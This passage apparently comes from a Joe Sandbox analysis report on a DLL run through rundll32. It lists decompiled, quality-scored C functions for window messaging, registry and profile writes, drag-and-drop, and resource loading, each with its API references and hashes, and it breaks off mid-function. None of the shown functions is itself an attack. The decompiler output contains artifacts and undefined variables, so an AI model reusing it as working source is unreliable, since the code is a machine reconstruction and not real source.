                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientEnabledFromLongParentPointScreen
                                                                        • String ID:
                                                                        • API String ID: 2204725058-0
                                                                        • Opcode ID: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                        • Instruction ID: b169f4ebd7b1781a2425983f4991e3855304b76673034f1eafd2744fb62dc6a9
                                                                        • Opcode Fuzzy Hash: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                        • Instruction Fuzzy Hash: D3014F3A600615BFDB12FB59CC44DAE7BB9EF89690B11416AF901DB211EB30DE40DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E10022B16(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                        				void* __ebp;
                                                                        				struct HWND__* _t16;
                                                                        				void* _t20;
                                                                        				struct HWND__* _t23;
                                                                        
                                                                        				_t16 = GetTopWindow(_a4);
                                                                        				while(1) {
                                                                        					_t23 = _t16;
                                                                        					if(_t23 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(_a24 == 0) {
                                                                        						SendMessageA(_t23, _a8, _a12, _a16);
                                                                        					} else {
                                                                        						_push(_t23);
                                                                        						_t20 = E10022115();
                                                                        						if(_t20 != 0) {
                                                                        							_push(_a16);
                                                                        							_push(_a12);
                                                                        							_push(_a8);
                                                                        							_push( *((intOrPtr*)(_t20 + 0x1c)));
                                                                        							_push(_t20);
                                                                        							E1002283F();
                                                                        						}
                                                                        					}
                                                                        					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
                                                                        						E10022B16(_t23, _a8, _a12, _a16, _a20, _a24);
                                                                        					}
                                                                        					_t16 = GetWindow(_t23, 2);
                                                                        				}
                                                                        				return _t16;
                                                                        			}








                                                                        APIs
                                                                        • GetTopWindow.USER32(?), ref: 10022B24
                                                                        • GetTopWindow.USER32(00000000), ref: 10022B63
                                                                        • GetWindow.USER32(00000000,00000002), ref: 10022B81
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window
                                                                        • String ID:
                                                                        • API String ID: 2353593579-0
                                                                        • Opcode ID: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                        • Instruction ID: 59ebec99428bed81cbae9e399db4f0855efa5802a24bdab8832a78d2f0a6533d
                                                                        • Opcode Fuzzy Hash: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                        • Instruction Fuzzy Hash: FC01A93600151ABBDF13AFE1AC05EDF3B6AEF45391F814011FA1455062C736D971EBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E10022422(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                        				void* __ebp;
                                                                        				struct HWND__* _t10;
                                                                        				void* _t13;
                                                                        				struct HWND__* _t15;
                                                                        				struct HWND__* _t16;
                                                                        				void* _t17;
                                                                        
                                                                        				_t13 = __ecx;
                                                                        				_t15 = GetDlgItem(_a4, _a8);
                                                                        				if(_t15 == 0) {
                                                                        					L6:
                                                                        					_t10 = GetTopWindow(_a4);
                                                                        					while(1) {
                                                                        						_t16 = _t10;
                                                                        						if(_t16 == 0) {
                                                                        							goto L10;
                                                                        						}
                                                                        						_t10 = E10022422(_t13, _t16, _a8, _a12);
                                                                        						if(_t10 == 0) {
                                                                        							_t10 = GetWindow(_t16, 2);
                                                                        							continue;
                                                                        						}
                                                                        						goto L10;
                                                                        					}
                                                                        				} else {
                                                                        					if(GetTopWindow(_t15) == 0) {
                                                                        						L3:
                                                                        						_push(_t15);
                                                                        						if(_a12 == 0) {
                                                                        							return E100220EE(_t17);
                                                                        						}
                                                                        						_t10 = E10022115();
                                                                        						if(_t10 == 0) {
                                                                        							goto L6;
                                                                        						}
                                                                        					} else {
                                                                        						_t10 = E10022422(_t13, _t15, _a8, _a12);
                                                                        						if(_t10 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L10:
                                                                        				return _t10;
                                                                        			}










                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 1002242D
                                                                        • GetTopWindow.USER32(00000000), ref: 10022440
                                                                          • Part of subcall function 10022422: GetWindow.USER32(00000000,00000002), ref: 10022487
                                                                        • GetTopWindow.USER32(?), ref: 10022470
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item
                                                                        • String ID:
                                                                        • API String ID: 369458955-0
                                                                        • Opcode ID: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                        • Instruction ID: cbb5f4ea75b5981124a7b3c1720515b8597a7f038d3602274fac482962cbe2a9
                                                                        • Opcode Fuzzy Hash: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                        • Instruction Fuzzy Hash: A701623650166BBBDB23BFE2BC00E9F3B99EF462E4F828121FD0499111D731D9629691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002B47F(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
                                                                        				intOrPtr _v8;
                                                                        				char _v24;
                                                                        				intOrPtr _t15;
                                                                        				long _t22;
                                                                        				void* _t31;
                                                                        				void* _t32;
                                                                        
                                                                        				_t15 =  *0x1004c470; // 0x1bfbe703
                                                                        				_t31 = __ecx;
                                                                        				_v8 = _t15;
                                                                        				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
                                                                        					wsprintfA( &_v24, 0x1003cc28, _a12);
                                                                        					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
                                                                        				} else {
                                                                        					_t32 = E10035959(__ecx, _a4);
                                                                        					if(_t32 != 0) {
                                                                        						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
                                                                        						RegCloseKey(_t32);
                                                                        						_t19 = 0 | _t22 == 0x00000000;
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(_t19, _v8);
                                                                        			}










                                                                        APIs
                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 1002B4B3
                                                                        • RegCloseKey.ADVAPI32(00000000,?,?), ref: 1002B4BC
                                                                        • wsprintfA.USER32 ref: 1002B4D8
                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B4EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                        • String ID:
                                                                        • API String ID: 1902064621-0
                                                                        • Opcode ID: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                        • Instruction ID: 9a6bc9ffc77bb201adb5d4a8a8e7071db867b7f7a5a0f8b8952f6efe61c2a51a
                                                                        • Opcode Fuzzy Hash: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                        • Instruction Fuzzy Hash: A001403250161AEFDB02EFA5CD45E9E3BB8FF44754F044415FA04EB152DB71DA118B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10031D85(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v268;
                                                                        				int _v272;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t14;
                                                                        				int _t24;
                                                                        				intOrPtr* _t30;
                                                                        				void* _t33;
                                                                        
                                                                        				_t14 =  *0x1004c470; // 0x1bfbe703
                                                                        				_v8 = _t14;
                                                                        				E100220EE(_t33, SetActiveWindow( *(__ecx + 0x1c)));
                                                                        				_t24 = 0;
                                                                        				_v272 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
                                                                        				_t30 =  *((intOrPtr*)(E100373B5() + 4));
                                                                        				if(_v272 > 0) {
                                                                        					do {
                                                                        						DragQueryFileA(_a4, _t24,  &_v268, 0x104);
                                                                        						_t18 =  *((intOrPtr*)( *_t30 + 0x88))( &_v268);
                                                                        						_t24 = _t24 + 1;
                                                                        					} while (_t24 < _v272);
                                                                        				}
                                                                        				DragFinish(_a4);
                                                                        				return E100117AE(_t18, _v8);
                                                                        			}












                                                                        APIs
                                                                        • SetActiveWindow.USER32(?), ref: 10031D9C
                                                                        • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10031DB7
                                                                        • DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 10031DDF
                                                                        • DragFinish.SHELL32(?), ref: 10031DFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Similarity
                                                                        • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                        • String ID:
                                                                        • API String ID: 892977027-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100368F3(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                                                                        				signed short _t21;
                                                                        				void* _t37;
                                                                        
                                                                        				_t37 = __ecx;
                                                                        				if(IsWindow( *(__ecx + 0x1c)) == 0) {
                                                                        					 *(_t37 + 0xa8) = _a4;
                                                                        					 *(_t37 + 0xac) = _a8;
                                                                        					 *(_t37 + 0xa0) = _a12;
                                                                        					_t21 = _a16;
                                                                        					 *(_t37 + 0xa4) = _t21;
                                                                        					return _t21;
                                                                        				}
                                                                        				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                                                        				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                                                                        				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
                                                                        			}






                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$InvalidateRectWindow
                                                                        • String ID:
                                                                        • API String ID: 3225880595-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 37%
                                                                        			E10036FD8(short* _a4) {
                                                                        				char* _v0;
                                                                        				int _v8;
                                                                        				char* _v16;
                                                                        				int _t6;
                                                                        				char* _t7;
                                                                        				short* _t11;
                                                                        				void* _t12;
                                                                        				void* _t16;
                                                                        				int _t17;
                                                                        
                                                                        				_t11 = _a4;
                                                                        				if(_t11 != 0) {
                                                                        					__imp__#7(_t11, _t12, _t16);
                                                                        					_t17 = _t6;
                                                                        					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
                                                                        					_v0 = _t7;
                                                                        					__imp__#150(0, _t7);
                                                                        					_v16 = _t7;
                                                                        					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
                                                                        					return _v16;
                                                                        				}
                                                                        				return 0;
                                                                        			}













                                                                        APIs
                                                                        • SysStringLen.OLEAUT32(?), ref: 10036FEC
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,10039361,00000000), ref: 10037002
                                                                        • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1003700A
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,10039361,00000000), ref: 1003701F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Similarity
                                                                        • API ID: Byte$CharMultiStringWide$Alloc
                                                                        • String ID:
                                                                        • API String ID: 3384502665-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10036B96(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				char _v16;
                                                                        				int _t12;
                                                                        				signed int _t16;
                                                                        				int _t18;
                                                                        				intOrPtr _t19;
                                                                        				void* _t24;
                                                                        				intOrPtr* _t27;
                                                                        
                                                                        				_t19 = _a4;
                                                                        				_t27 = __ecx;
                                                                        				E1002F372(__ecx, _t19, _a8);
                                                                        				_t12 = E100202AB(__ecx);
                                                                        				if((_t12 & 0x00000001) != 0) {
                                                                        					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
                                                                        					if(_t12 == 0) {
                                                                        						 *((intOrPtr*)( *_t27 + 0x110))(0x407, 0,  &_v16, _t24);
                                                                        						_t16 = GetSystemMetrics(5);
                                                                        						_t18 = GetSystemMetrics(2);
                                                                        						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
                                                                        						return _t18;
                                                                        					}
                                                                        				}
                                                                        				return _t12;
                                                                        			}











                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • GetParent.USER32(?), ref: 10036BBB
                                                                        • IsZoomed.USER32(00000000), ref: 10036BC2
                                                                        • GetSystemMetrics.USER32 ref: 10036BEA
                                                                        • GetSystemMetrics.USER32 ref: 10036BF8
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Similarity
                                                                        • API ID: MetricsSystem$LongParentWindowZoomed
                                                                        • String ID:
                                                                        • API String ID: 3909876373-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 54%
                                                                        			E1000BFC5(intOrPtr _a4, RECT* _a8, int _a12) {
                                                                        				struct tagRECT _v20;
                                                                        				intOrPtr _t28;
                                                                        
                                                                        				_t28 = _a4;
                                                                        				if(_a8 != 0) {
                                                                        					IntersectRect( &_v20, _a8, _t28 - 0x9c);
                                                                        					EqualRect( &_v20, _a8);
                                                                        				} else {
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        				}
                                                                        				if(IsRectEmpty( &_v20) == 0) {
                                                                        					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
                                                                        				}
                                                                        				return 0;
                                                                        			}






                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Similarity
                                                                        • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                        • String ID:
                                                                        • API String ID: 3354205298-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100214B2(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
                                                                        				long _v12;
                                                                        				void _v16;
                                                                        				intOrPtr _t12;
                                                                        				long _t16;
                                                                        
                                                                        				if(_a4 == 0 || _a16 == 0) {
                                                                        					L10:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t12 = _a12;
                                                                        					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10029A8E(_a8, _t12) == 0) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						GetObjectA(_a16, 0xc,  &_v16);
                                                                        						SetBkColor(_a4, _v12);
                                                                        						_t16 = _a20;
                                                                        						if(_t16 == 0xffffffff) {
                                                                        							_t16 = GetSysColor(8);
                                                                        						}
                                                                        						SetTextColor(_a4, _t16);
                                                                        						return 1;
                                                                        					}
                                                                        				}
                                                                        			}








                                                                        APIs
                                                                        • GetObjectA.GDI32(00000000,0000000C,?), ref: 100214F0
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 100214FC
                                                                        • GetSysColor.USER32(00000008), ref: 1002150C
                                                                        • SetTextColor.GDI32(00000000,?), ref: 10021516
                                                                          • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Color$LongObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2871169696-0
                                                                        • Opcode ID: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                        • Instruction ID: 07a055e2fde14eb44e4b892d4051d3cd351fecf6f4b2367e44398545aae672e6
                                                                        • Opcode Fuzzy Hash: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
                                                                        • Instruction Fuzzy Hash: 0301283A900529EBEB429FA0EC85AEB3BA4EB55291F908560FD13C40A1C730CD90DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002415A(void* __ecx, CHAR* _a4) {
                                                                        				void* __edi;
                                                                        				struct HRSRC__* _t8;
                                                                        				void* _t9;
                                                                        				void* _t11;
                                                                        				void* _t14;
                                                                        				void* _t15;
                                                                        				struct HINSTANCE__* _t16;
                                                                        				void* _t17;
                                                                        
                                                                        				_t14 = 0;
                                                                        				_t11 = 0;
                                                                        				_t17 = __ecx;
                                                                        				if(_a4 == 0) {
                                                                        					L4:
                                                                        					_t15 = E100232BF(_t17, _t14, _t11);
                                                                        					if(_t11 != 0 && _t14 != 0) {
                                                                        						FreeResource(_t14);
                                                                        					}
                                                                        					return _t15;
                                                                        				}
                                                                        				_t16 =  *(E100373B5() + 0xc);
                                                                        				_t8 = FindResourceA(_t16, _a4, 0xf0);
                                                                        				if(_t8 == 0) {
                                                                        					goto L4;
                                                                        				}
                                                                        				_t9 = LoadResource(_t16, _t8);
                                                                        				_t14 = _t9;
                                                                        				if(_t14 != 0) {
                                                                        					_t11 = LockResource(_t14);
                                                                        					goto L4;
                                                                        				}
                                                                        				return _t9;
                                                                        			}












                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002417C
                                                                        • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024188
                                                                        • LockResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024195
                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 100241B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLock
                                                                        • String ID:
                                                                        • API String ID: 1078018258-0
                                                                        • Opcode ID: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
                                                                        • Instruction ID: fdd0e0ea882c3c69c4099ed456d0cfd7dce8bbf4e7d741b6fad66cb09ea4bd77
                                                                        • Opcode Fuzzy Hash: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
                                                                        • Instruction Fuzzy Hash: 40F0903A2412256FD3029FA65C88D3FB6FDEFB59E6B424038FD05D6212DE209C5587A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E1002095F(void* __ecx) {
                                                                        				int _t26;
                                                                        				int _t28;
                                                                        				void* _t41;
                                                                        
                                                                        				E10011BF0(0x1003a4d8, _t41);
                                                                        				_push(__ecx);
                                                                        				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
                                                                        					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
                                                                        					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                        					_push(_t41 - 0x10);
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
                                                                        					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
                                                                        					_t26 = lstrlenA( *(_t41 + 8));
                                                                        					E100014B0( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
                                                                        					_t28 = _t26;
                                                                        				} else {
                                                                        					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
                                                                        				return _t28;
                                                                        			}







                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10020964
                                                                        • GetWindowTextA.USER32 ref: 1002097C
                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,1002CC3A,?,00000104,?), ref: 100209B2
                                                                        • lstrlenA.KERNEL32(?,?,?,1002CC3A,?,00000104,?), ref: 100209BB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3022380644-0
                                                                        • Opcode ID: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                        • Instruction ID: 9a5806592f70ea17751b7fdaa6094fb832eb62a9ddc39452fd7da2019fb28030
                                                                        • Opcode Fuzzy Hash: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                        • Instruction Fuzzy Hash: 75019E36900129EFDB05DFA4CC48BAEBBB2FF48314F00C619F512AB262CB719950DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1001B66F(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
                                                                        				void* _t12;
                                                                        				void* _t18;
                                                                        				intOrPtr* _t20;
                                                                        				void* _t21;
                                                                        				void* _t22;
                                                                        
                                                                        				_t20 = _a4;
                                                                        				_t19 = _a8;
                                                                        				_t12 = E1001B64E( *_t20,  *_a8, _t20);
                                                                        				_t22 = _t21 + 0xc;
                                                                        				if(_t12 != 0) {
                                                                        					_t3 = _t20 + 4; // 0x4
                                                                        					_t18 = E1001B64E( *_t3, 1, _t3);
                                                                        					_t22 = _t22 + 0xc;
                                                                        					if(_t18 != 0) {
                                                                        						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
                                                                        					}
                                                                        				}
                                                                        				_t6 = _t20 + 4; // 0x4
                                                                        				if(E1001B64E( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
